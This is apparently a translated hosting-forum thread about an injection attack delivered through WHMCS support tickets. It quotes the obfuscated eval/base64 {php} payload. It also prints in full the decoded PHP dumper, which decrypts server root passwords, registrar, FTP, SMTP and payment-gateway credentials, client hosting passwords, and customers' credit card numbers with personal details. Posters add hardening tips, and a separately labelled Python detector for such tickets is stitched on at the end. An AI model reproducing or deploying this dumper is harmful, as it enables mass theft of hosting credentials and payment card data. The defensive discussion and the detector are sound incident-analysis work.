Injection via WHMCS SUPPORT TICKET


Status
Not open for further replies.
Here's the code:

Code:
{php}eval(base64_decode('JGNvZGUgPSBiYXNlNj.....4WW5JK1BHSnlQaWM3SUg wTkNuME5DajgrIik7DQokZm8gPSBmb3BlbigidGVtcGxhdGVzL 2p4aC5waHAiLCJ3Iik7DQpmd3JpdGUoJGZvLCRjb2RlKTt=')) ;{/php})

Hey, this looks like the code at the start of this thread, bro. CG, please edit this code as well so it can't be copy-pasted by anyone who wants to mess with somebody's WHMCS :(

Btw, how do you know this intrusion succeeded in creating a new user, bro? Just a user in WHMCS, or could it create a cPanel account?
 

I know because that user was also detected sending a support ticket; it shows from the client ID (click it to see which package he took, and you can see there too that he sent a support ticket).

Here's the pic (he only managed to create an account in WHMCS, not in WHM/cPanel)

[Image: 2dh9x7p.jpg]
 
If you want to create a new username in WHMCS, surely that doesn't need any injection? Anyone can register. But succeeding in creating a new cPanel user, now that is probably the main target. I think the script is still the same one, that is, meant to grab the username and password for the SQL database.
 
For additional security, it's best to rename the admin folder and install SSL.
At least then, to log in, the hacker first has to guess the name of the admin folder.
 
That's true... if you want to create an account in WHMCS you can do it directly... but it looks like this person created the WHMCS account without coming in and knocking on the front door.
 
Personally, this is what I have been doing so far:
1. WHMCS is installed on a server separate from the servers for clients
2. Password protection via .htaccess on the admin folder
3. Implement the standard WHMCS security measures
4. Upload a PHP file like the one here
5. I separate support tickets from the first WHMCS and install them on another server. The first WHMCS is only the client area for managing products, and this one is only for tickets.
 
Tonight there is still someone attempting this technique. Trying trial and error :D
Encode result:

include('configuration.php');

$query = mysql_query("SELECT * FROM tblservers");
$text=$text."\r\n######################### HOST ROOTS ###########################\r\n";
while($v = mysql_fetch_array($query)) {

$ipaddress = $v['ipaddress'];
$username = $v['username'];
$type = $v['type'];
$active = $v['active'];
$hostname = $v['hostname'];


$password = decrypt ($v['password'], $cc_encryption_hash);

$text=$text."Type $type\r\n";
$text=$text."Active $active\r\n";
$text=$text."Hostname $hostname\r\n";
$text=$text."Ip $ipaddress\r\n";
$text=$text."Username $username\r\n";
$text=$text."Password $password\r\n**************************************\r\n";


}
$text=$text."\r\n######################### HOST ROOTS ###########################\r\n";

$text=$text."\r\n######################### Domain Reseller ###########################\r\n";

$query = mysql_query("SELECT * FROM tblregistrars");

while($v = mysql_fetch_array($query)) {

$registrar = $v['registrar'];
$setting = $v['setting'];
$value = decrypt ($v['value'], $cc_encryption_hash);
if ($value=="") {
$value=0;
}
$password = decrypt ($v['password'], $cc_encryption_hash);
$text=$text."$registrar $setting $value\r\n";
}
$text=$text."\r\n######################### Domain Reseller ###########################\r\n";

$text=$text."\r\n######################### FTP +SMTP ###########################\r\n";
$query = mysql_query("SELECT * FROM tblconfiguration where setting='FTPBackupHostname' or setting='FTPBackupUsername' or setting='FTPBackupPassword' or setting='FTPBackupDestination' or setting='SMTPHost' or setting='SMTPUsername' or setting='SMTPPassword' or setting='SMTPPort'");
while($v = mysql_fetch_array($query)) {
$value =$v['value'];
if ($value=="") {
$value=0;
}

$text=$text.$v['setting']." ".$value."\r\n" ;

}


$text=$text."\r\n######################### FTP +SMTP ###########################\r\n";

$text=$text."\r\n######################### Payment gateway ###########################\r\n";
$query = mysql_query("SELECT * FROM tblpaymentgateways");
while($v = mysql_fetch_array($query)) {

$gateway = $v['gateway'];
$setting = $v['setting'];
$value = $v['value'];

$text=$text."$gateway|$setting|$value\r\n";


}
$text=$text."\r\n######################### Payment gateway ###########################\r\n";

$text=$text."\r\n######################### Client R00ts ###########################\r\n";
$query = mysql_query("SELECT * FROM tblhosting where (username = 'root' or username = 'Admin' or username = 'admin' or username = 'Administrator' or username = 'administrator') and domainstatus='Active'");


while($v = mysql_fetch_array($query)) {
$text=$text."\r\nDomain ".$v['domain']."\r\nIP ".$v['dedicatedip']."\r\nUsername ".$v['username']."\r\nPassword ".decrypt ($v['password'], $cc_encryption_hash)."\r\nDomainstatus".$v['domainstatus']."\r\n";
}
$text=$text."\r\n######################### Client R00ts ###########################\r\n";

$text=$text."\r\n######################### Client HOST ###########################\r\n";
$query = mysql_query("SELECT * FROM tblhosting where domainstatus='Active'");


while($v = mysql_fetch_array($query)) {
if (($v['username'] ) and ($v['password'])) {
$text=$text."\r\nDomain ".$v['domain']."\r\nIP ".$v['dedicatedip']."\r\nUsername ".$v['username']."\r\nPassword ".decrypt ($v['password'], $cc_encryption_hash)."\r\nDomainstatus".$v['domainstatus']."\r\n";
}
}
$text=$text."\r\n######################### Client HOST ###########################\r\n";


$text=$text."\r\n######################### Client CC ###########################\r\n";
$query = mysql_query("SELECT * FROM `tblclients` WHERE cardtype <> '' order by issuenumber desc");


while($v = mysql_fetch_array($query)) {
$cchash = md5( $cc_encryption_hash.$v['0']);
$s= mysql_query("select cardtype,AES_DECRYPT(cardnum,'{$cchash}') as cardnum,AES_DECRYPT(expdate,'{$cchash}') as expdate,AES_DECRYPT(issuenumber,'{$cchash}') as issuenumber,AES_DECRYPT(startdate,'{$cchash}') as startdate,country,email,firstname,lastname,address1,city,state,postcode,phonenumber FROM `tblclients` where id='".$v['0']."'" );

$country = $v['country'];
$email = $v['email'];

$firstname = $v['firstname'];
$lastname = $v['lastname'];
$address1 = $v['address1'];
$city = $v['city'];
$state = $v['state'];
$postcode = $v['postcode'];
$phonenumber = $v['phonenumber'];

$v2=mysql_fetch_array($s);

$text=$text."\r\n".$v2[0]."|".$v2[1]."|".$v2[2]."|".$v2[3]."|".$v2[4]." $firstname $lastname ~ $address1:$city:$state:$postcode:$phonenumber $country $email\r\n";
}




$text=$text."\r\n######################### Client CC ###########################\r\n";

echo($text);
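
An added example, not code from any poster in this thread or from WHMCS: a static triage of ticket text for Smarty `{php}` blocks that unwraps nested `base64_decode` literals without executing anything and reports which names from the decoded dump above show up. The function names, the indicator list and the sample ticket are assumptions constructed for illustration.

```python
import base64
import binascii
import re

# Smarty {php} blocks, the wrapper used in the ticket text quoted in this thread.
PHP_TAG = re.compile(r"\{php\}(.*?)\{/php\}", re.S | re.I)
# String literal handed to base64_decode(); embedded whitespace is tolerated.
B64_CALL = re.compile(r"base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=\s]+)['\"]", re.I)
# Names that appear in the decoded dump posted in this thread.
INDICATORS = ("configuration.php", "cc_encryption_hash", "tblservers",
              "tblregistrars", "tblpaymentgateways", "tblhosting",
              "tblclients", "AES_DECRYPT")


def decode_layers(code, max_depth=5):
    """Statically unwrap nested base64_decode('...') literals; nothing is executed."""
    layers = [code]
    for _ in range(max_depth):
        decoded = []
        for blob in B64_CALL.findall(layers[-1]):
            try:
                raw = base64.b64decode("".join(blob.split()), validate=True)
            except (binascii.Error, ValueError):
                continue  # damaged or truncated literal: skip it
            decoded.append(raw.decode("utf-8", "replace"))
        if not decoded:
            break
        layers.append("\n".join(decoded))
    return layers


def triage_ticket(text):
    """Return findings for one ticket field, or None when it has no {php} block."""
    blocks = PHP_TAG.findall(text)
    if not blocks:
        return None
    layers = decode_layers("\n".join(blocks))
    joined = "\n".join(layers).lower()
    return {"php_blocks": len(blocks),
            "decoded_layers": len(layers) - 1,
            "uses_eval": "eval(" in joined.replace(" ", ""),
            "indicators": sorted(i for i in INDICATORS if i.lower() in joined)}


def b64(s):
    return base64.b64encode(s.encode()).decode()

# Constructed sample (not the blob from the thread), encoded twice.
inner = "include('configuration.php'); $q = 'SELECT * FROM tblservers';"
outer = "$code = base64_decode('%s');" % b64(inner)
SAMPLE_TICKET = "Please help {php}eval(base64_decode('%s'));{/php}" % b64(outer)
```

A ticket whose literal is truncated or damaged still gets flagged for the `{php}` block and the `eval`, with zero decoded layers.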
 